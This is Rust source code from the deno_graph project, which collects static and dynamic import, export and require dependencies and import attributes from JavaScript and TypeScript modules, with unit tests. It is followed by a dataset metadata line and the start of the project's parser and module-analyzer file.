/// Any leading comments associated with the dependency. This is used for
/// further processing of supported pragma that impact the dependency.
pub leading_comments: Vec<DependencyComment>,
/// The range of the import/export statement.
pub range: SourceRange,
/// The text specifier associated with the import/export statement.
pub specifier: Atom,
/// The range of the specifier.
pub specifier_range: SourceRange,
/// Import attributes for this dependency.
pub import_attributes: ImportAttributes,
/// If this is an import for side effects only (ex. `import './load.js';`)
pub is_side_effect: bool,
}
impl From<StaticDependencyDescriptor> for DependencyDescriptor {
fn from(descriptor: StaticDependencyDescriptor) -> Self {
DependencyDescriptor::Static(descriptor)
}
}
#[derive(Clone, Debug, Eq, PartialEq)]
pub struct DynamicDependencyDescriptor {
/// Kind of dynamic dependency.
pub kind: DynamicDependencyKind,
/// Any leading comments associated with the dependency. This is used for
/// further processing of supported pragma that impact the dependency.
pub leading_comments: Vec<DependencyComment>,
/// The range of the import/export statement.
pub range: SourceRange,
/// The argument associated with the dynamic import
pub argument: DynamicArgument,
/// The range of the specifier.
pub argument_range: SourceRange,
/// Import attributes for this dependency.
pub import_attributes: ImportAttributes,
}
impl From<DynamicDependencyDescriptor> for DependencyDescriptor {
fn from(descriptor: DynamicDependencyDescriptor) -> Self {
DependencyDescriptor::Dynamic(descriptor)
}
}
#[derive(Clone, Debug, Eq, PartialEq)]
pub enum DynamicArgument {
String(Atom),
Template(Vec<DynamicTemplatePart>),
/// An expression that could not be analyzed.
Expr,
}
#[derive(Clone, Debug, Eq, PartialEq)]
pub enum DynamicTemplatePart {
String(Atom),
/// An expression that could not be analyzed.
Expr,
}
struct DependencyCollector<'a> {
comments: &'a MultiThreadedComments,
pub items: Vec<DependencyDescriptor>,
}
impl DependencyCollector<'_> {
fn get_leading_comments(&self, start: SourcePos) -> Vec<DependencyComment> {
match self.comments.get_leading(start) {
Some(leading) => leading
.iter()
.map(|c| DependencyComment {
kind: c.kind,
range: c.range(),
text: c.text.clone(),
})
.collect(),
None => Vec::new(),
}
}
fn is_require(&self, callee: &Callee) -> bool {
match callee {
Callee::Expr(expr) => match &**expr {
// assume any ident named `require` is a require call
// even if it's not using the global or the result of
// calling `createRequire`.
Expr::Ident(ident) => ident.sym == "require",
_ => false,
},
_ => false,
}
}
}
impl Visit for DependencyCollector<'_> {
fn visit_import_decl(&mut self, node: &ast::ImportDecl) {
let leading_comments = self.get_leading_comments(node.start());
let kind = match (node.type_only, node.phase) {
(true, _) => StaticDependencyKind::ImportType,
(false, ImportPhase::Evaluation) => StaticDependencyKind::Import,
(false, ImportPhase::Source) => StaticDependencyKind::ImportSource,
(false, ImportPhase::Defer) => return,
};
self.items.push(
StaticDependencyDescriptor {
kind,
leading_comments,
range: node.range(),
specifier: node.src.value.to_atom_lossy().into_owned(),
specifier_range: node.src.range(),
import_attributes: parse_import_attributes(node.with.as_deref()),
is_side_effect: node.specifiers.is_empty(),
}
.into(),
);
}
fn visit_named_export(&mut self, node: &ast::NamedExport) {
let Some(src) = &node.src else {
return;
};
let leading_comments = self.get_leading_comments(node.start());
let kind = if node.type_only {
StaticDependencyKind::ExportType
} else {
StaticDependencyKind::Export
};
self.items.push(
StaticDependencyDescriptor {
kind,
leading_comments,
range: node.range(),
specifier: src.value.to_atom_lossy().into_owned(),
specifier_range: src.range(),
import_attributes: parse_import_attributes(node.with.as_deref()),
is_side_effect: false,
}
.into(),
);
}
fn visit_export_all(&mut self, node: &ast::ExportAll) {
let leading_comments = self.get_leading_comments(node.start());
let kind = if node.type_only {
StaticDependencyKind::ExportType
} else {
StaticDependencyKind::Export
};
self.items.push(
StaticDependencyDescriptor {
kind,
leading_comments,
range: node.range(),
specifier: node.src.value.to_atom_lossy().into_owned(),
specifier_range: node.src.range(),
import_attributes: parse_import_attributes(node.with.as_deref()),
is_side_effect: false,
}
.into(),
);
}
fn visit_ts_import_type(&mut self, node: &ast::TsImportType) {
let leading_comments = self.get_leading_comments(node.start());
self.items.push(
StaticDependencyDescriptor {
kind: StaticDependencyKind::ImportType,
leading_comments,
range: node.range(),
specifier: node.arg.value.to_atom_lossy().into_owned(),
specifier_range: node.arg.range(),
import_attributes: node
.attributes
.as_ref()
.map(|a| parse_import_attributes_from_object_lit(&a.with))
.unwrap_or_default(),
is_side_effect: false,
}
.into(),
);
node.visit_children_with(self);
}
fn visit_module_items(&mut self, items: &[ast::ModuleItem]) {
items.visit_children_with(self);
}
fn visit_stmts(&mut self, items: &[ast::Stmt]) {
items.visit_children_with(self)
}
fn visit_call_expr(&mut self, node: &ast::CallExpr) {
node.visit_children_with(self);
let kind = match &node.callee {
Callee::Import(import) => match import.phase {
ImportPhase::Evaluation => DynamicDependencyKind::Import,
ImportPhase::Source => DynamicDependencyKind::ImportSource,
ImportPhase::Defer => return,
},
_ if self.is_require(&node.callee) => DynamicDependencyKind::Require,
_ => return,
};
let Some(arg) = node.args.first() else {
return;
};
let argument = match &*arg.expr {
Expr::Lit(ast::Lit::Str(specifier)) => {
DynamicArgument::String(specifier.value.to_atom_lossy().into_owned())
}
Expr::Tpl(tpl) => {
if tpl.quasis.len() == 1 && tpl.exprs.is_empty() {
DynamicArgument::String(
tpl.quasis[0]
.cooked
.as_ref()
.unwrap()
.to_atom_lossy()
.into_owned(),
)
} else {
let mut parts =
Vec::with_capacity(tpl.quasis.len() + tpl.exprs.len());
for i in 0..tpl.quasis.len() {
let cooked = tpl.quasis[i].cooked.as_ref().unwrap();
if !cooked.is_empty() {
parts.push(DynamicTemplatePart::String(
cooked.to_atom_lossy().into_owned(),
));
}
if tpl.exprs.get(i).is_some() {
parts.push(DynamicTemplatePart::Expr);
}
}
DynamicArgument::Template(parts)
}
}
Expr::Bin(bin) => {
let mut parts = Vec::with_capacity(2);
fn visit_bin(
parts: &mut Vec<DynamicTemplatePart>,
bin: &ast::BinExpr,
) -> Result<(), ()> {
if bin.op != ast::BinaryOp::Add {
return Err(());
}
match &*bin.left {
Expr::Bin(left) => {
visit_bin(parts, left)?;
}
Expr::Lit(ast::Lit::Str(str)) => {
parts.push(DynamicTemplatePart::String(
str.value.to_atom_lossy().into_owned(),
));
}
_ => {
if parts.is_empty() {
return Err(());
}
parts.push(DynamicTemplatePart::Expr);
}
};
if let Expr::Lit(ast::Lit::Str(str)) = &*bin.right {
parts.push(DynamicTemplatePart::String(
str.value.to_atom_lossy().into_owned(),
));
} else {
parts.push(DynamicTemplatePart::Expr);
}
Ok(())
}
if visit_bin(&mut parts, bin).is_ok() {
DynamicArgument::Template(parts)
} else {
DynamicArgument::Expr
}
}
_ => DynamicArgument::Expr,
};
let dynamic_import_attributes =
parse_dynamic_import_attributes(node.args.get(1));
let leading_comments = self.get_leading_comments(node.start());
self.items.push(
DynamicDependencyDescriptor {
kind,
leading_comments,
range: node.range(),
argument,
argument_range: arg.range(),
import_attributes: dynamic_import_attributes,
}
.into(),
);
}
fn visit_ts_import_equals_decl(&mut self, node: &ast::TsImportEqualsDecl) {
use ast::TsModuleRef;
if let TsModuleRef::TsExternalModuleRef(module) = &node.module_ref {
let leading_comments = self.get_leading_comments(node.start());
let expr = &module.expr;
let kind = if node.is_type_only {
StaticDependencyKind::ImportType
} else if node.is_export {
StaticDependencyKind::ExportEquals
} else {
StaticDependencyKind::ImportEquals
};
self.items.push(
StaticDependencyDescriptor {
kind,
leading_comments,
range: node.range(),
specifier: expr.value.to_atom_lossy().into_owned(),
specifier_range: expr.range(),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
);
}
}
fn visit_ts_module_decl(&mut self, node: &ast::TsModuleDecl) {
if let Some(id_str) = node.id.as_str() {
let value_str = id_str.value.to_string_lossy();
if !value_str.contains('*')
|| value_str.starts_with("./")
|| value_str.starts_with("../")
|| value_str.starts_with('/')
{
let leading_comments = self.get_leading_comments(node.start());
self.items.push(
StaticDependencyDescriptor {
kind: StaticDependencyKind::MaybeTsModuleAugmentation,
leading_comments,
range: id_str.range(),
specifier: id_str.value.to_atom_lossy().into_owned(),
specifier_range: id_str.range(),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
);
}
}
node.visit_children_with(self);
}
}
/// Parses import attributes into a hashmap. According to proposal the values
/// can only be strings (https://github.com/tc39/proposal-import-attributes#should-more-than-just-strings-be-supported-as-attribute-values)
/// and thus non-string values are skipped.
fn parse_import_attributes(
maybe_attrs: Option<&ast::ObjectLit>,
) -> ImportAttributes {
let Some(attrs) = maybe_attrs else {
return ImportAttributes::None;
};
let mut import_attributes = HashMap::new();
for prop in attrs.props.iter() {
if let ast::PropOrSpread::Prop(prop) = prop
&& let ast::Prop::KeyValue(key_value) = &**prop
{
let maybe_key = match &key_value.key {
ast::PropName::Str(key) => key.value.as_atom(),
ast::PropName::Ident(ident) => Some(&ident.sym),
_ => None,
};
if let Some(key) = maybe_key
&& let ast::Expr::Lit(ast::Lit::Str(str_)) = &*key_value.value
&& let Some(value_str) = str_.value.as_str()
{
import_attributes.insert(
key.to_string(),
ImportAttribute::Known(value_str.to_string()),
);
}
}
}
ImportAttributes::Known(import_attributes)
}
/// Parses import attributes from the second arg of a dynamic import.
fn parse_dynamic_import_attributes(
arg: Option<&ast::ExprOrSpread>,
) -> ImportAttributes {
let arg = match arg {
Some(arg) => arg,
None => return ImportAttributes::None,
};
if arg.spread.is_some() {
return ImportAttributes::Unknown;
}
let object_lit = match &*arg.expr {
ast::Expr::Object(object_lit) => object_lit,
_ => return ImportAttributes::Unknown,
};
let mut attributes_map = HashMap::new();
let mut had_attributes_key = false;
let mut had_with_key = false;
for prop in object_lit.props.iter() {
let prop = match prop {
ast::PropOrSpread::Prop(prop) => prop,
_ => return ImportAttributes::Unknown,
};
let key_value = match &**prop {
ast::Prop::KeyValue(key_value) => key_value,
_ => return ImportAttributes::Unknown,
};
let key = match &key_value.key {
ast::PropName::Str(key) => match key.value.as_atom() {
Some(key) => key,
None => return ImportAttributes::Unknown,
},
ast::PropName::Ident(ident) => &ident.sym,
_ => return ImportAttributes::Unknown,
};
if key == "with" || key == "assert" && !had_with_key {
had_attributes_key = true;
had_with_key = key == "with";
let attributes_lit = match &*key_value.value {
ast::Expr::Object(lit) => lit,
_ => return ImportAttributes::Unknown,
};
match parse_import_attributes_from_object_lit(attributes_lit) {
ImportAttributes::Known(hash_map) => {
attributes_map = hash_map;
}
value => return value,
}
}
}
if had_attributes_key {
ImportAttributes::Known(attributes_map)
} else {
ImportAttributes::None
}
}
fn parse_import_attributes_from_object_lit(
attributes_lit: &ast::ObjectLit,
) -> ImportAttributes {
let mut attributes_map = HashMap::with_capacity(attributes_lit.props.len());
for prop in attributes_lit.props.iter() {
let prop = match prop {
ast::PropOrSpread::Prop(prop) => prop,
_ => return ImportAttributes::Unknown,
};
let key_value = match &**prop {
ast::Prop::KeyValue(key_value) => key_value,
_ => return ImportAttributes::Unknown,
};
let key = match &key_value.key {
ast::PropName::Str(key) => match key.value.as_atom() {
Some(key) => key,
None => return ImportAttributes::Unknown,
},
ast::PropName::Ident(ident) => &ident.sym,
_ => return ImportAttributes::Unknown,
};
if let ast::Expr::Lit(value_lit) = &*key_value.value {
attributes_map.insert(
key.to_string(),
if let ast::Lit::Str(str_) = value_lit
&& let Some(value) = str_.value.as_str()
{
ImportAttribute::Known(value.to_string())
} else {
ImportAttribute::Unknown
},
);
} else {
attributes_map.insert(key.to_string(), ImportAttribute::Unknown);
}
}
ImportAttributes::Known(attributes_map)
}
#[cfg(test)]
mod tests {
use crate::ModuleSpecifier;
use deno_ast::SourcePos;
use deno_ast::SourceRange;
use deno_ast::SourceRangedForSpanned;
use deno_ast::swc::atoms::Atom;
use deno_ast::swc::common::comments::CommentKind;
use pretty_assertions::assert_eq;
use super::*;
fn helper(
specifier: &str,
source: &str,
) -> (SourcePos, Vec<DependencyDescriptor>) {
let source = deno_ast::parse_module(deno_ast::ParseParams {
specifier: ModuleSpecifier::parse(specifier).unwrap(),
text: source.into(),
media_type: crate::MediaType::Tsx,
capture_tokens: false,
scope_analysis: false,
maybe_syntax: None,
})
.unwrap();
(
source.program_ref().start(),
analyze_program_dependencies(source.program_ref(), source.comments()),
)
}
#[test]
fn test_parsed_module_get_dependencies() {
let source = r#"import * as bar from "./test.ts";
/** JSDoc */
import type { Foo } from "./foo.d.ts";
/// <reference foo="bar" />
export * as Buzz from "./buzz.ts";
// @some-pragma
/**
* Foo
*/
export type { Fizz } from "./fizz.d.ts";
const { join } = require("path");
// dynamic
await import("./foo1.ts");
try {
const foo = await import("./foo.ts");
} catch (e) {
// pass
}
try {
const foo = require("some_package");
} catch (e) {
// pass
}
import foo2 = require("some_package_foo");
import type FooType = require('some_package_foo_type');
export import bar2 = require("some_package_bar");
const foo3 = require.resolve("some_package_resolve");
try {
const foo4 = require.resolve("some_package_resolve_foo");
} catch (e) {
// pass
}
"#;
let (start_pos, dependencies) = helper("file:///test.ts", source);
assert_eq!(
dependencies,
vec![
StaticDependencyDescriptor {
kind: StaticDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos, start_pos + 33),
specifier: Atom::from("./test.ts"),
specifier_range: SourceRange::new(start_pos + 21, start_pos + 32),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::ImportType,
leading_comments: vec![DependencyComment {
kind: CommentKind::Block,
text: r#"* JSDoc "#.into(),
range: SourceRange::new(start_pos + 34, start_pos + 46),
}],
range: SourceRange::new(start_pos + 47, start_pos + 85),
specifier: Atom::from("./foo.d.ts"),
specifier_range: SourceRange::new(start_pos + 72, start_pos + 84),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::Export,
leading_comments: vec![DependencyComment {
kind: CommentKind::Line,
text: r#"/ <reference foo="bar" />"#.into(),
range: SourceRange::new(start_pos + 86, start_pos + 113),
}],
range: SourceRange::new(start_pos + 114, start_pos + 148),
specifier: Atom::from("./buzz.ts"),
specifier_range: SourceRange::new(start_pos + 136, start_pos + 147),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::ExportType,
leading_comments: vec![
DependencyComment {
kind: CommentKind::Line,
text: r#" @some-pragma"#.into(),
range: SourceRange::new(start_pos + 149, start_pos + 164),
},
DependencyComment {
kind: CommentKind::Block,
text: "*\n * Foo\n ".into(),
range: SourceRange::new(start_pos + 165, start_pos + 179),
}
],
range: SourceRange::new(start_pos + 180, start_pos + 220),
specifier: Atom::from("./fizz.d.ts"),
specifier_range: SourceRange::new(start_pos + 206, start_pos + 219),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
DynamicDependencyDescriptor {
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 238, start_pos + 253),
argument: DynamicArgument::String(Atom::from("path")),
argument_range: SourceRange::new(start_pos + 246, start_pos + 252),
import_attributes: Default::default(),
kind: DynamicDependencyKind::Require,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 272, start_pos + 291),
argument: DynamicArgument::String(Atom::from("./foo1.ts")),
argument_range: SourceRange::new(start_pos + 279, start_pos + 290),
import_attributes: Default::default(),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 321, start_pos + 339),
argument: DynamicArgument::String(Atom::from("./foo.ts")),
argument_range: SourceRange::new(start_pos + 328, start_pos + 338),
import_attributes: Default::default(),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Require,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 391, start_pos + 414),
argument: DynamicArgument::String(Atom::from("some_package")),
argument_range: SourceRange::new(start_pos + 399, start_pos + 413),
import_attributes: Default::default(),
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::ImportEquals,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 444, start_pos + 486),
specifier: Atom::from("some_package_foo"),
specifier_range: SourceRange::new(start_pos + 466, start_pos + 484),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::ImportType,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 487, start_pos + 542),
specifier: Atom::from("some_package_foo_type"),
specifier_range: SourceRange::new(start_pos + 517, start_pos + 540),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::ExportEquals,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 543, start_pos + 592),
specifier: Atom::from("some_package_bar"),
specifier_range: SourceRange::new(start_pos + 572, start_pos + 590),
import_attributes: Default::default(),
is_side_effect: false,
}
.into(),
]
);
}
#[test]
fn test_import_attributes() {
let source = r#"import * as bar from "./test.ts" with { "type": "typescript" };
export * from "./test.ts" with { "type": "typescript" };
export { bar } from "./test.json" with { "type": "json" };
import foo from "./foo.json" with { type: "json" };
const fizz = await import("./fizz.json", { "with": { type: "json" } });
const buzz = await import("./buzz.json", { with: { "type": "json" } });
const d1 = await import("./d1.json");
const d2 = await import("./d2.json", {});
const d3 = await import("./d3.json", bar);
const d4 = await import("./d4.json", { with: {} });
const d5 = await import("./d5.json", { with: bar });
const d6 = await import("./d6.json", { with: {}, ...bar });
const d7 = await import("./d7.json", { with: {}, ["assert"]: "bad" });
const d8 = await import("./d8.json", { with: { type: bar } });
const d9 = await import("./d9.json", { with: { type: "json", ...bar } });
const d10 = await import("./d10.json", { with: { type: "json", ["type"]: "bad" } });
"#;
let (start_pos, dependencies) = helper("file:///test.ts", source);
let expected_attributes1 = ImportAttributes::Known({
let mut map = HashMap::new();
map.insert(
"type".to_string(),
ImportAttribute::Known("typescript".to_string()),
);
map
});
let expected_attributes2 = ImportAttributes::Known({
let mut map = HashMap::new();
map.insert(
"type".to_string(),
ImportAttribute::Known("json".to_string()),
);
map
});
let dynamic_expected_attributes2 = ImportAttributes::Known({
let mut map = HashMap::new();
map.insert(
"type".to_string(),
ImportAttribute::Known("json".to_string()),
);
map
});
assert_eq!(
dependencies,
vec![
StaticDependencyDescriptor {
kind: StaticDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos, start_pos + 63),
specifier: Atom::from("./test.ts"),
specifier_range: SourceRange::new(start_pos + 21, start_pos + 32),
import_attributes: expected_attributes1.clone(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::Export,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 64, start_pos + 120),
specifier: Atom::from("./test.ts"),
specifier_range: SourceRange::new(start_pos + 78, start_pos + 89),
import_attributes: expected_attributes1,
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::Export,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 121, start_pos + 179),
specifier: Atom::from("./test.json"),
specifier_range: SourceRange::new(start_pos + 141, start_pos + 154),
import_attributes: expected_attributes2.clone(),
is_side_effect: false,
}
.into(),
StaticDependencyDescriptor {
kind: StaticDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 180, start_pos + 231),
specifier: Atom::from("./foo.json"),
specifier_range: SourceRange::new(start_pos + 196, start_pos + 208),
import_attributes: expected_attributes2,
is_side_effect: false,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 251, start_pos + 302),
argument: DynamicArgument::String(Atom::from("./fizz.json")),
argument_range: SourceRange::new(start_pos + 258, start_pos + 271),
import_attributes: dynamic_expected_attributes2.clone(),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 323, start_pos + 374),
argument: DynamicArgument::String(Atom::from("./buzz.json")),
argument_range: SourceRange::new(start_pos + 330, start_pos + 343),
import_attributes: dynamic_expected_attributes2,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 393, start_pos + 412),
argument: DynamicArgument::String(Atom::from("./d1.json")),
argument_range: SourceRange::new(start_pos + 400, start_pos + 411),
import_attributes: Default::default(),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 431, start_pos + 454),
argument: DynamicArgument::String(Atom::from("./d2.json")),
argument_range: SourceRange::new(start_pos + 438, start_pos + 449),
import_attributes: Default::default(),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 473, start_pos + 497),
argument: DynamicArgument::String(Atom::from("./d3.json")),
argument_range: SourceRange::new(start_pos + 480, start_pos + 491),
import_attributes: ImportAttributes::Unknown,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 516, start_pos + 549),
argument: DynamicArgument::String(Atom::from("./d4.json")),
argument_range: SourceRange::new(start_pos + 523, start_pos + 534),
import_attributes: ImportAttributes::Known(HashMap::new()),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 568, start_pos + 602),
argument: DynamicArgument::String(Atom::from("./d5.json")),
argument_range: SourceRange::new(start_pos + 575, start_pos + 586),
import_attributes: ImportAttributes::Unknown,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 621, start_pos + 662),
argument: DynamicArgument::String(Atom::from("./d6.json")),
argument_range: SourceRange::new(start_pos + 628, start_pos + 639),
import_attributes: ImportAttributes::Unknown,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 681, start_pos + 733),
argument: DynamicArgument::String(Atom::from("./d7.json")),
argument_range: SourceRange::new(start_pos + 688, start_pos + 699),
import_attributes: ImportAttributes::Unknown,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 752, start_pos + 796),
argument: DynamicArgument::String(Atom::from("./d8.json")),
argument_range: SourceRange::new(start_pos + 759, start_pos + 770),
import_attributes: ImportAttributes::Known({
let mut map = HashMap::new();
map.insert("type".to_string(), ImportAttribute::Unknown);
map
}),
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 815, start_pos + 870),
argument: DynamicArgument::String(Atom::from("./d9.json")),
argument_range: SourceRange::new(start_pos + 822, start_pos + 833),
import_attributes: ImportAttributes::Unknown,
}
.into(),
DynamicDependencyDescriptor {
kind: DynamicDependencyKind::Import,
leading_comments: Vec::new(),
range: SourceRange::new(start_pos + 890, start_pos + 955),
argument: DynamicArgument::String(Atom::from("./d10.json")),
argument_range: SourceRange::new(start_pos + 897, start_pos + 909),
import_attributes: ImportAttributes::Unknown,
}
.into(),
]
);
}
#[test]
fn test_dynamic_imports() {
let source = r#"const d1 = await import(`./d1.json`);
const d2 = await import(`${value}`);
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | true |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/ast/mod.rs | src/ast/mod.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use crate::analysis::DependencyDescriptor;
use crate::analysis::DynamicArgument;
use crate::analysis::DynamicDependencyDescriptor;
use crate::analysis::DynamicTemplatePart;
use crate::analysis::JsDocImportInfo;
use crate::analysis::ModuleAnalyzer;
use crate::analysis::ModuleInfo;
use crate::analysis::SpecifierWithRange;
use crate::analysis::StaticDependencyDescriptor;
use crate::analysis::TypeScriptReference;
use crate::analysis::TypeScriptTypesResolutionMode;
use crate::analysis::find_deno_types;
use crate::analysis::find_jsx_import_source;
use crate::analysis::find_jsx_import_source_types;
use crate::analysis::find_path_reference;
use crate::analysis::find_resolution_mode;
use crate::analysis::find_source_mapping_url;
use crate::analysis::find_ts_self_types;
use crate::analysis::find_ts_types;
use crate::analysis::find_types_reference;
use crate::analysis::is_comment_triple_slash_reference;
use crate::graph::Position;
use crate::graph::PositionRange;
use crate::module_specifier::ModuleSpecifier;
use deno_ast::MultiThreadedComments;
use deno_ast::ProgramRef;
use deno_ast::SourcePos;
use deno_ast::SourceRanged;
use deno_ast::SourceRangedForSpanned;
use deno_ast::MediaType;
use deno_ast::ParseDiagnostic;
use deno_ast::ParsedSource;
use deno_ast::SourceTextInfo;
use deno_ast::swc::common::comments::CommentKind;
use deno_error::JsErrorBox;
use std::cell::RefCell;
use std::collections::HashMap;
use std::sync::Arc;
use self::dep::DependencyComment;
use self::dep::analyze_program_dependencies;
mod dep;
pub struct ParseOptions<'a> {
pub specifier: &'a ModuleSpecifier,
pub source: Arc<str>,
pub media_type: MediaType,
pub scope_analysis: bool,
}
/// Parses programs to a ParsedSource.
pub trait EsParser {
fn parse_program(
&self,
options: ParseOptions,
) -> Result<ParsedSource, ParseDiagnostic>;
}
#[derive(Default, Clone)]
pub struct DefaultEsParser;
impl EsParser for DefaultEsParser {
fn parse_program(
&self,
options: ParseOptions,
) -> Result<ParsedSource, ParseDiagnostic> {
deno_ast::parse_program(deno_ast::ParseParams {
specifier: options.specifier.clone(),
text: options.source,
media_type: options.media_type,
capture_tokens: options.scope_analysis,
scope_analysis: options.scope_analysis,
maybe_syntax: None,
})
}
}
/// Stores parsed sources.
///
/// Note: This interface is racy and not thread safe, as it's assumed
/// it will only store the latest changes or that the source text
/// will never change.
pub trait ParsedSourceStore {
/// Sets the parsed source, potentially returning the previous value.
fn set_parsed_source(
&self,
specifier: ModuleSpecifier,
parsed_source: ParsedSource,
) -> Option<ParsedSource>;
fn get_parsed_source(
&self,
specifier: &ModuleSpecifier,
) -> Option<ParsedSource>;
fn remove_parsed_source(
&self,
specifier: &ModuleSpecifier,
) -> Option<ParsedSource>;
/// Gets a `deno_ast::ParsedSource` from the store, upgrading it
/// to have scope analysis if it doesn't already.
fn get_scope_analysis_parsed_source(
&self,
specifier: &ModuleSpecifier,
) -> Option<ParsedSource>;
}
/// Default store that works on a single thread.
#[derive(Default)]
pub struct DefaultParsedSourceStore {
store: RefCell<HashMap<ModuleSpecifier, ParsedSource>>,
}
impl ParsedSourceStore for DefaultParsedSourceStore {
fn set_parsed_source(
&self,
specifier: ModuleSpecifier,
parsed_source: ParsedSource,
) -> Option<ParsedSource> {
self.store.borrow_mut().insert(specifier, parsed_source)
}
fn get_parsed_source(
&self,
specifier: &ModuleSpecifier,
) -> Option<ParsedSource> {
self.store.borrow().get(specifier).cloned()
}
fn remove_parsed_source(
&self,
specifier: &ModuleSpecifier,
) -> Option<ParsedSource> {
self.store.borrow_mut().remove(specifier)
}
fn get_scope_analysis_parsed_source(
&self,
specifier: &ModuleSpecifier,
) -> Option<ParsedSource> {
let mut store = self.store.borrow_mut();
let parsed_source = store.get_mut(specifier)?;
if parsed_source.has_scope_analysis() {
Some(parsed_source.clone())
} else {
let parsed_source = store.remove(specifier).unwrap();
let parsed_source = parsed_source.into_with_scope_analysis();
store.insert(specifier.clone(), parsed_source.clone());
Some(parsed_source.clone())
}
}
}
/// Stores parsed files in the provided store after parsing.
/// in a provided store. Parses that match the previous one
/// will be cached.
///
/// Note that this will insert into the store whatever was
/// last parsed, so if two threads race to parse, when they're
/// both done it will have whatever was last stored.
#[derive(Clone, Copy)]
pub struct CapturingEsParser<'a> {
parser: Option<&'a dyn EsParser>,
store: &'a dyn ParsedSourceStore,
}
impl<'a> CapturingEsParser<'a> {
pub fn new(
parser: Option<&'a dyn EsParser>,
store: &'a dyn ParsedSourceStore,
) -> Self {
Self { parser, store }
}
fn get_from_store_if_matches(
&self,
options: &ParseOptions,
) -> Option<ParsedSource> {
let parsed_source = if options.scope_analysis {
self
.store
.get_scope_analysis_parsed_source(options.specifier)?
} else {
self.store.get_parsed_source(options.specifier)?
};
if parsed_source.media_type() == options.media_type
&& parsed_source.text().as_ref() == options.source.as_ref()
{
Some(parsed_source)
} else {
None
}
}
}
impl EsParser for CapturingEsParser<'_> {
fn parse_program(
&self,
options: ParseOptions,
) -> Result<ParsedSource, ParseDiagnostic> {
match self.get_from_store_if_matches(&options) {
Some(parsed_source) => Ok(parsed_source),
_ => {
let default_parser = DefaultEsParser;
let parser = self.parser.unwrap_or(&default_parser);
let specifier = options.specifier.clone();
let parsed_source = parser.parse_program(options)?;
self
.store
.set_parsed_source(specifier, parsed_source.clone());
Ok(parsed_source)
}
}
}
}
#[derive(Default)]
pub struct DefaultModuleAnalyzer;
#[async_trait::async_trait(?Send)]
impl ModuleAnalyzer for DefaultModuleAnalyzer {
async fn analyze(
&self,
specifier: &deno_ast::ModuleSpecifier,
source: Arc<str>,
media_type: MediaType,
) -> Result<ModuleInfo, JsErrorBox> {
ParserModuleAnalyzer::default()
.analyze(specifier, source, media_type)
.await
}
}
/// Default module analyzer that analyzes based on a deno_ast::ParsedSource.
pub struct ParserModuleAnalyzer<'a> {
parser: &'a dyn EsParser,
}
impl<'a> ParserModuleAnalyzer<'a> {
/// Creates a new module analyzer.
pub fn new(parser: &'a dyn EsParser) -> Self {
Self { parser }
}
/// Gets the module info from a parsed source.
pub fn module_info(parsed_source: &ParsedSource) -> ModuleInfo {
let program = parsed_source.program_ref();
Self::module_info_from_swc(
parsed_source.media_type(),
program,
parsed_source.text_info_lazy(),
parsed_source.comments(),
)
}
pub fn module_info_from_swc(
media_type: MediaType,
program: ProgramRef,
